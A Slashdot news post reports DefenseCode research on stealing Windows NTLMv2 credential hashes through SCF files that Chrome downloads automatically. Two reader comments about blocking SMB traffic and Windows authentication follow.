Slashdot is powered by your submissions, so send in your scoop

 


Forgot your password?
Close
typodupeerror
Security Bug Chrome Windows

Stealing Windows Credentials Using Google Chrome (helpnetsecurity.com) 13

Posted by EditorDavid from the browser-bugs dept.
Orome1 writes: A default setting in Google Chrome, which allows it to download files that it deems safe without prompting the user for a download location, can be exploited by attackers to mount a Windows credential theft attack using specially-crafted SCF shortcut files, DefenseCode researchers have found. What's more, for the attack to work, the victim does not even have to run the automatically downloaded file. Simply opening the download directory in Windows File Explorer will trigger the code icon file location inserted in the file to run, and it will send the victim's username, domain and NTLMv2 password hash to a remote SMB server operated by the attackers.

Stealing Windows Credentials Using Google Chrome More | Reply

Stealing Windows Credentials Using Google Chrome

Comments Filter:

  • And this is EXACTLY why all of the LAN > WAN firewalls I manage have SMB/CIFS blocked. There is no reason to send that traffic over WAN. If it is needed for connection to a remote location, that's what a VPN connection is for.

  • I can't get over the fact in 2017 Microsoft has yet to incorporate a single secure authentication protocol into any of its operating systems. They haven't even tried.

    It would be relatively trivial to select a PAKE and make it backwards compatible with existing NT hash databases. They just don't seem to care.

Slashdot Top Deals

Can anyone remember when the times were not hard, and money not scarce?

Close